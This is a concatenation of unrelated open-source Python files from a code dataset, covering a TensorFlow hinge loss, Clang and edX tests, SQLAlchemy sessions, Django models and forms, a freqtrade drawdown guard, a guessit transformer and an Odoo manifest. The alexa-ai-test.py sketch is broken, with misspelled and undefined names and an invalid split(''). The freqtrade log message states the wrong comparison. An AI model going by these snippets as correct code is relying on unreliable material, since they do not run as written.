by Crammer and Singer.
link: http://jmlr.csail.mit.edu/papers/volume2/crammer01a/crammer01a.pdf
This is a generalization of standard (binary) hinge loss. For a given instance
with correct label c*, the loss is given by:
loss = max_{c != c*} logits_c - logits_{c*} + 1.
or equivalently
loss = max_c { logits_c - logits_{c*} + I_{c != c*} }
where I_{c != c*} = 1 if c != c* and 0 otherwise.
Args:
labels: `Tensor` of shape [batch_size] or [batch_size, 1]. Corresponds to
the ground truth. Each entry must be an index in `[0, num_classes)`.
logits: `Tensor` of shape [batch_size, num_classes] corresponding to the
unscaled logits. Its dtype should be either `float32` or `float64`.
weights: Optional (python) scalar or `Tensor`. If a non-scalar `Tensor`, its
rank should be either 1 ([batch_size]) or 2 ([batch_size, 1]).
scope: The scope for the operations performed in computing the loss.
loss_collection: collection to which the loss will be added.
reduction: Type of reduction to apply to loss.
Returns:
Weighted loss float `Tensor`. If `reduction` is `NONE`, this has the same
shape as `labels`; otherwise, it is a scalar.
Raises:
ValueError: If `logits`, `labels` or `weights` have invalid or inconsistent
shapes.
ValueError: If `labels` tensor has invalid dtype.
"""
with ops.name_scope(scope, 'sparse_multiclass_hinge_loss', (logits,
labels)) as scope:
# Check logits Tensor has valid rank.
logits_shape = logits.get_shape()
logits_rank = logits_shape.ndims
if logits_rank != 2:
raise ValueError(
'logits should have rank 2 ([batch_size, num_classes]). Given rank is'
' {}'.format(logits_rank))
batch_size, num_classes = logits_shape[0].value, logits_shape[1].value
logits = math_ops.to_float(logits)
# Check labels have valid type.
if labels.dtype != dtypes.int32 and labels.dtype != dtypes.int64:
raise ValueError(
'Invalid dtype for labels: {}. Acceptable dtypes: int32 and int64'.
format(labels.dtype))
# Check labels and weights have valid ranks and are consistent.
labels_rank = labels.get_shape().ndims
if labels_rank not in [1, 2]:
raise ValueError(
'labels should have rank 1 ([batch_size]) or 2 ([batch_size, 1]). '
'Given rank is {}'.format(labels_rank))
with ops.control_dependencies([
check_ops.assert_less(labels, math_ops.cast(num_classes, labels.dtype))
]):
labels = array_ops.reshape(labels, shape=[-1])
weights = ops.convert_to_tensor(weights)
weights_rank = weights.get_shape().ndims
if weights_rank not in [0, 1, 2]:
raise ValueError(
'non-scalar weights should have rank 1 ([batch_size]) or 2 '
'([batch_size, 1]). Given rank is {}'.format(labels_rank))
if weights_rank > 0:
weights = array_ops.reshape(weights, shape=[-1])
# Check weights and labels have the same number of elements.
weights.get_shape().assert_is_compatible_with(labels.get_shape())
# Compute the logits tensor corresponding to the correct class per instance.
example_indices = array_ops.reshape(
math_ops.range(batch_size), shape=[batch_size, 1])
indices = array_ops.concat(
[
example_indices,
array_ops.reshape(
math_ops.cast(labels, example_indices.dtype),
shape=[batch_size, 1])
],
axis=1)
label_logits = array_ops.reshape(
array_ops.gather_nd(params=logits, indices=indices),
shape=[batch_size, 1])
one_cold_labels = array_ops.one_hot(
indices=labels, depth=num_classes, on_value=0.0, off_value=1.0)
margin = logits - label_logits + one_cold_labels
margin = nn_ops.relu(margin)
loss = math_ops.reduce_max(margin, axis=1)
return losses.compute_weighted_loss(
loss, weights, scope, loss_collection, reduction=reduction)
|
esakellari/root
|
refs/heads/master
|
interpreter/llvm/src/tools/clang/bindings/python/tests/cindex/test_access_specifiers.py
|
82
|
from clang.cindex import AccessSpecifier
from clang.cindex import Cursor
from clang.cindex import TranslationUnit
from .util import get_cursor
from .util import get_tu
def test_access_specifiers():
"""Ensure that C++ access specifiers are available on cursors"""
tu = get_tu("""
class test_class {
public:
void public_member_function();
protected:
void protected_member_function();
private:
void private_member_function();
};
""", lang = 'cpp')
test_class = get_cursor(tu, "test_class")
assert test_class.access_specifier == AccessSpecifier.INVALID;
public = get_cursor(tu.cursor, "public_member_function")
assert public.access_specifier == AccessSpecifier.PUBLIC
protected = get_cursor(tu.cursor, "protected_member_function")
assert protected.access_specifier == AccessSpecifier.PROTECTED
private = get_cursor(tu.cursor, "private_member_function")
assert private.access_specifier == AccessSpecifier.PRIVATE
|
edxzw/edx-platform
|
refs/heads/master
|
common/djangoapps/xblock_django/migrations/0001_initial.py
|
62
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='XBlockDisableConfig',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('change_date', models.DateTimeField(auto_now_add=True, verbose_name='Change date')),
('enabled', models.BooleanField(default=False, verbose_name='Enabled')),
('disabled_blocks', models.TextField(default=b'', help_text='Space-separated list of XBlocks which should not render.', blank=True)),
('changed_by', models.ForeignKey(on_delete=django.db.models.deletion.PROTECT, editable=False, to=settings.AUTH_USER_MODEL, null=True, verbose_name='Changed by')),
],
options={
'ordering': ('-change_date',),
'abstract': False,
},
),
]
|
ChuckCottrill/CodeSamples
|
refs/heads/master
|
python/alexa-ai-test.py
|
1
|
'''
Prompt:
A circular definition is one that uses the term being defined as part of the definition.
For example, define
“oak” : “a tree that grows from an acorn”
“acorn” : “the nut produced by an oak tree”.
acorn = nut, produced, oak-tree
acorn -> nut -> oak -> acorn
acorn -> tree -> nut -> oak -> acorn
Task: Given a dictionary, identify all of the circular definitions.
'''
non_important = [ 'the', 'a', 'an' ] #etc
def extract_important_words(definition):
# define function...
words = definition.split('')
words = remove_articles(words)
words = remove_unimportant(ewords)
return words # ['nut', 'produce', 'oak', 'tree']
# (word, defintion)\
# definition = list(words)
# dictionary = list(words)
# for every word in dictionary:
def find_path(dictionary,root,path):
frontier = extract_important_words(dicgtionary[word]) #firest level
for element in frontier:
if element == root:
return path # match
nextpath = copy(path)
path.append(find_path(dictionary,root,nextpath))
return []
def find_circular(dictionary,word):
frontier = extract_important_words(dicgtionary[word]) #firest level
for element in frontier:
path = []
if element == root:
return [word]
found = find_path(dictionary,root,path)
if len(found) > 0:
print("found", found.join('->'))
def find_all_circular(dictionary):
for word,_ in dictionary:
found = find_circular(dictionary,word)
if len(found) > 0:
circular[word] = found
# 1. ['oak -> acorn -> oak']
# 2. number of circular definitions
|
olivierdalang/stdm
|
refs/heads/master
|
third_party/sqlalchemy/orm/scoping.py
|
1
|
# orm/scoping.py
# Copyright (C) 2005-2014 the SQLAlchemy authors and contributors
# <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from .. import exc as sa_exc
from ..util import ScopedRegistry, ThreadLocalRegistry, warn
from . import class_mapper, exc as orm_exc
from .session import Session
__all__ = ['scoped_session']
class scoped_session(object):
"""Provides scoped management of :class:`.Session` objects.
See :ref:`unitofwork_contextual` for a tutorial.
"""
def __init__(self, session_factory, scopefunc=None):
"""Construct a new :class:`.scoped_session`.
:param session_factory: a factory to create new :class:`.Session`
instances. This is usually, but not necessarily, an instance
of :class:`.sessionmaker`.
:param scopefunc: optional function which defines
the current scope. If not passed, the :class:`.scoped_session`
object assumes "thread-local" scope, and will use
a Python ``threading.local()`` in order to maintain the current
:class:`.Session`. If passed, the function should return
a hashable token; this token will be used as the key in a
dictionary in order to store and retrieve the current
:class:`.Session`.
"""
self.session_factory = session_factory
if scopefunc:
self.registry = ScopedRegistry(session_factory, scopefunc)
else:
self.registry = ThreadLocalRegistry(session_factory)
def __call__(self, **kw):
"""Return the current :class:`.Session`, creating it
using the session factory if not present.
:param \**kw: Keyword arguments will be passed to the
session factory callable, if an existing :class:`.Session`
is not present. If the :class:`.Session` is present and
keyword arguments have been passed,
:exc:`~sqlalchemy.exc.InvalidRequestError` is raised.
"""
if kw:
scope = kw.pop('scope', False)
if scope is not None:
if self.registry.has():
raise sa_exc.InvalidRequestError(
"Scoped session is already present; "
"no new arguments may be specified.")
else:
sess = self.session_factory(**kw)
self.registry.set(sess)
return sess
else:
return self.session_factory(**kw)
else:
return self.registry()
def remove(self):
"""Dispose of the current :class:`.Session`, if present.
This will first call :meth:`.Session.close` method
on the current :class:`.Session`, which releases any existing
transactional/connection resources still being held; transactions
specifically are rolled back. The :class:`.Session` is then
discarded. Upon next usage within the same scope,
the :class:`.scoped_session` will produce a new
:class:`.Session` object.
"""
if self.registry.has():
self.registry().close()
self.registry.clear()
def configure(self, **kwargs):
"""reconfigure the :class:`.sessionmaker` used by this
:class:`.scoped_session`.
See :meth:`.sessionmaker.configure`.
"""
if self.registry.has():
warn('At least one scoped session is already present. '
' configure() can not affect sessions that have '
'already been created.')
self.session_factory.configure(**kwargs)
def query_property(self, query_cls=None):
"""return a class property which produces a :class:`.Query` object
against the class and the current :class:`.Session` when called.
e.g.::
Session = scoped_session(sessionmaker())
class MyClass(object):
query = Session.query_property()
# after mappers are defined
result = MyClass.query.filter(MyClass.name=='foo').all()
Produces instances of the session's configured query class by
default. To override and use a custom implementation, provide
a ``query_cls`` callable. The callable will be invoked with
the class's mapper as a positional argument and a session
keyword argument.
There is no limit to the number of query properties placed on
a class.
"""
class query(object):
def __get__(s, instance, owner):
try:
mapper = class_mapper(owner)
if mapper:
if query_cls:
# custom query class
return query_cls(mapper, session=self.registry())
else:
# session's configured query class
return self.registry().query(mapper)
except orm_exc.UnmappedClassError:
return None
return query()
ScopedSession = scoped_session
"""Old name for backwards compatibility."""
def instrument(name):
def do(self, *args, **kwargs):
return getattr(self.registry(), name)(*args, **kwargs)
return do
for meth in Session.public_methods:
setattr(scoped_session, meth, instrument(meth))
def makeprop(name):
def set(self, attr):
setattr(self.registry(), name, attr)
def get(self):
return getattr(self.registry(), name)
return property(get, set)
for prop in ('bind', 'dirty', 'deleted', 'new', 'identity_map',
'is_active', 'autoflush', 'no_autoflush', 'info'):
setattr(scoped_session, prop, makeprop(prop))
def clslevel(name):
def do(cls, *args, **kwargs):
return getattr(Session, name)(*args, **kwargs)
return classmethod(do)
for prop in ('close_all', 'object_session', 'identity_key'):
setattr(scoped_session, prop, clslevel(prop))
|
snamstorm/rockstor-core
|
refs/heads/master
|
src/rockstor/smart_manager/models/nfsd_uid_gid.py
|
8
|
"""
Copyright (c) 2012-2013 RockStor, Inc. <http://rockstor.com>
This file is part of RockStor.
RockStor is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published
by the Free Software Foundation; either version 2 of the License,
or (at your option) any later version.
RockStor is distributed in the hope that it will be useful, but
WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
from django.db import models
from smart_manager.models import SProbe
class NFSDUidGidDistribution(models.Model):
"""
for a given ts and share, number and i/o size of various nfs calls
"""
rid = models.ForeignKey(SProbe)
ts = models.DateTimeField(db_index=True)
share = models.CharField(max_length=255)
client = models.CharField(max_length=100)
uid = models.IntegerField(default=0)
gid = models.IntegerField(default=0)
num_lookup = models.BigIntegerField(default=0)
num_read = models.BigIntegerField(default=0)
num_write = models.BigIntegerField(default=0)
num_create = models.BigIntegerField(default=0)
num_commit = models.BigIntegerField(default=0)
num_remove = models.BigIntegerField(default=0)
"""
sums are in KB
"""
sum_read = models.BigIntegerField(default=0)
sum_write = models.BigIntegerField(default=0)
class Meta:
app_label = 'smart_manager'
|
noslenfa/tdjangorest
|
refs/heads/master
|
uw/lib/python2.7/site-packages/django/contrib/localflavor/sk/forms.py
|
109
|
"""
Slovak-specific form helpers
"""
from __future__ import absolute_import, unicode_literals
from django.contrib.localflavor.sk.sk_districts import DISTRICT_CHOICES
from django.contrib.localflavor.sk.sk_regions import REGION_CHOICES
from django.forms.fields import Select, RegexField
from django.utils.translation import ugettext_lazy as _
class SKRegionSelect(Select):
"""
A select widget widget with list of Slovak regions as choices.
"""
def __init__(self, attrs=None):
super(SKRegionSelect, self).__init__(attrs, choices=REGION_CHOICES)
class SKDistrictSelect(Select):
"""
A select widget with list of Slovak districts as choices.
"""
def __init__(self, attrs=None):
super(SKDistrictSelect, self).__init__(attrs, choices=DISTRICT_CHOICES)
class SKPostalCodeField(RegexField):
"""
A form field that validates its input as Slovak postal code.
Valid form is XXXXX or XXX XX, where X represents integer.
"""
default_error_messages = {
'invalid': _('Enter a postal code in the format XXXXX or XXX XX.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(SKPostalCodeField, self).__init__(r'^\d{5}$|^\d{3} \d{2}$',
max_length, min_length, *args, **kwargs)
def clean(self, value):
"""
Validates the input and returns a string that contains only numbers.
Returns an empty string for empty values.
"""
v = super(SKPostalCodeField, self).clean(value)
return v.replace(' ', '')
|
gcarq/freqtrade
|
refs/heads/develop
|
freqtrade/plugins/protections/max_drawdown_protection.py
|
1
|
import logging
from datetime import datetime, timedelta
from typing import Any, Dict
import pandas as pd
from freqtrade.data.btanalysis import calculate_max_drawdown
from freqtrade.persistence import Trade
from freqtrade.plugins.protections import IProtection, ProtectionReturn
logger = logging.getLogger(__name__)
class MaxDrawdown(IProtection):
has_global_stop: bool = True
has_local_stop: bool = False
def __init__(self, config: Dict[str, Any], protection_config: Dict[str, Any]) -> None:
super().__init__(config, protection_config)
self._trade_limit = protection_config.get('trade_limit', 1)
self._max_allowed_drawdown = protection_config.get('max_allowed_drawdown', 0.0)
# TODO: Implement checks to limit max_drawdown to sensible values
def short_desc(self) -> str:
"""
Short method description - used for startup-messages
"""
return (f"{self.name} - Max drawdown protection, stop trading if drawdown is > "
f"{self._max_allowed_drawdown} within {self.lookback_period_str}.")
def _reason(self, drawdown: float) -> str:
"""
LockReason to use
"""
return (f'{drawdown} > {self._max_allowed_drawdown} in {self.lookback_period_str}, '
f'locking for {self.stop_duration_str}.')
def _max_drawdown(self, date_now: datetime) -> ProtectionReturn:
"""
Evaluate recent trades for drawdown ...
"""
look_back_until = date_now - timedelta(minutes=self._lookback_period)
trades = Trade.get_trades_proxy(is_open=False, close_date=look_back_until)
trades_df = pd.DataFrame([trade.to_json() for trade in trades])
if len(trades) < self._trade_limit:
# Not enough trades in the relevant period
return False, None, None
# Drawdown is always positive
try:
drawdown, _, _ = calculate_max_drawdown(trades_df, value_col='close_profit')
except ValueError:
return False, None, None
if drawdown > self._max_allowed_drawdown:
self.log_once(
f"Trading stopped due to Max Drawdown {drawdown:.2f} < {self._max_allowed_drawdown}"
f" within {self.lookback_period_str}.", logger.info)
until = self.calculate_lock_end(trades, self._stop_duration)
return True, until, self._reason(drawdown)
return False, None, None
def global_stop(self, date_now: datetime) -> ProtectionReturn:
"""
Stops trading (position entering) for all pairs
This must evaluate to true for the whole period of the "cooldown period".
:return: Tuple of [bool, until, reason].
If true, all pairs will be locked with <reason> until <until>
"""
return self._max_drawdown(date_now)
def stop_per_pair(self, pair: str, date_now: datetime) -> ProtectionReturn:
"""
Stops trading (position entering) for this pair
This must evaluate to true for the whole period of the "cooldown period".
:return: Tuple of [bool, until, reason].
If true, this pair will be locked with <reason> until <until>
"""
return False, None, None
|
badloop/SickRage
|
refs/heads/master
|
lib/guessit/transfo/guess_date.py
|
29
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# GuessIt - A library for guessing information from filenames
# Copyright (c) 2013 Nicolas Wack <wackou@gmail.com>
#
# GuessIt is free software; you can redistribute it and/or modify it under
# the terms of the Lesser GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# GuessIt is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# Lesser GNU General Public License for more details.
#
# You should have received a copy of the Lesser GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from __future__ import absolute_import, division, print_function, unicode_literals
from guessit.containers import DefaultValidator
from guessit.plugins.transformers import Transformer
from guessit.matcher import GuessFinder
from guessit.date import search_date
class GuessDate(Transformer):
def __init__(self):
Transformer.__init__(self, 50)
def register_arguments(self, opts, naming_opts, output_opts, information_opts, webservice_opts, other_options):
naming_opts.add_argument('-Y', '--date-year-first', action='store_true', dest='date_year_first', default=None,
help='If short date is found, consider the first digits as the year.')
naming_opts.add_argument('-D', '--date-day-first', action='store_true', dest='date_day_first', default=None,
help='If short date is found, consider the second digits as the day.')
def supported_properties(self):
return ['date']
@staticmethod
def guess_date(string, node=None, options=None):
date, span = search_date(string, options.get('date_year_first') if options else False, options.get('date_day_first') if options else False)
if date and span and DefaultValidator.validate_string(string, span): # ensure we have a separator before and after date
return {'date': date}, span
return None, None
def process(self, mtree, options=None):
GuessFinder(self.guess_date, 1.0, self.log, options).process_nodes(mtree.unidentified_leaves())
|
TheMOOCAgency/edx-platform
|
refs/heads/master
|
cms/djangoapps/contentstore/management/commands/tests/test_cleanup_assets.py
|
167
|
"""
Test for assets cleanup of courses for Mac OS metadata files (with filename ".DS_Store"
or with filename which starts with "._")
"""
from django.core.management import call_command
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from xmodule.contentstore.content import XASSET_LOCATION_TAG
from xmodule.contentstore.django import contentstore
from xmodule.modulestore.django import modulestore
from xmodule.modulestore import ModuleStoreEnum
from xmodule.modulestore.mongo.base import location_to_query
from xmodule.modulestore.tests.django_utils import ModuleStoreTestCase
from xmodule.modulestore.xml_importer import import_course_from_xml
from django.conf import settings
TEST_DATA_DIR = settings.COMMON_TEST_DATA_ROOT
class ExportAllCourses(ModuleStoreTestCase):
"""
Tests assets cleanup for all courses.
"""
def setUp(self):
""" Common setup. """
super(ExportAllCourses, self).setUp()
self.content_store = contentstore()
# pylint: disable=protected-access
self.module_store = modulestore()._get_modulestore_by_type(ModuleStoreEnum.Type.mongo)
def test_export_all_courses(self):
"""
This test validates that redundant Mac metadata files ('._example.txt', '.DS_Store') are
cleaned up on import
"""
import_course_from_xml(
self.module_store,
'**replace_user**',
TEST_DATA_DIR,
['dot-underscore'],
static_content_store=self.content_store,
do_import_static=True,
verbose=True
)
course = self.module_store.get_course(SlashSeparatedCourseKey('edX', 'dot-underscore', '2014_Fall'))
self.assertIsNotNone(course)
# check that there are two assets ['example.txt', '.example.txt'] in contentstore for imported course
all_assets, count = self.content_store.get_all_content_for_course(course.id)
self.assertEqual(count, 2)
self.assertEqual(set([asset['_id']['name'] for asset in all_assets]), set([u'.example.txt', u'example.txt']))
# manually add redundant assets (file ".DS_Store" and filename starts with "._")
course_filter = course.id.make_asset_key("asset", None)
query = location_to_query(course_filter, wildcard=True, tag=XASSET_LOCATION_TAG)
query['_id.name'] = all_assets[0]['_id']['name']
asset_doc = self.content_store.fs_files.find_one(query)
asset_doc['_id']['name'] = u'._example_test.txt'
self.content_store.fs_files.insert(asset_doc)
asset_doc['_id']['name'] = u'.DS_Store'
self.content_store.fs_files.insert(asset_doc)
# check that now course has four assets
all_assets, count = self.content_store.get_all_content_for_course(course.id)
self.assertEqual(count, 4)
self.assertEqual(
set([asset['_id']['name'] for asset in all_assets]),
set([u'.example.txt', u'example.txt', u'._example_test.txt', u'.DS_Store'])
)
# now call asset_cleanup command and check that there is only two proper assets in contentstore for the course
call_command('cleanup_assets')
all_assets, count = self.content_store.get_all_content_for_course(course.id)
self.assertEqual(count, 2)
self.assertEqual(set([asset['_id']['name'] for asset in all_assets]), set([u'.example.txt', u'example.txt']))
|
osvalr/odoo
|
refs/heads/8.0
|
addons/hr_gamification/__openerp__.py
|
320
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2013 OpenERP SA (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'HR Gamification',
'version': '1.0',
'author': 'OpenERP SA',
'category': 'hidden',
'website': 'https://www.odoo.com/page/employees',
'depends': ['gamification', 'hr'],
'description': """Use the HR ressources for the gamification process.
The HR officer can now manage challenges and badges.
This allow the user to send badges to employees instead of simple users.
Badge received are displayed on the user profile.
""",
'data': [
'security/ir.model.access.csv',
'security/gamification_security.xml',
'wizard/grant_badge.xml',
'views/gamification.xml',
'views/hr_gamification.xml',
],
'auto_install': True,
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.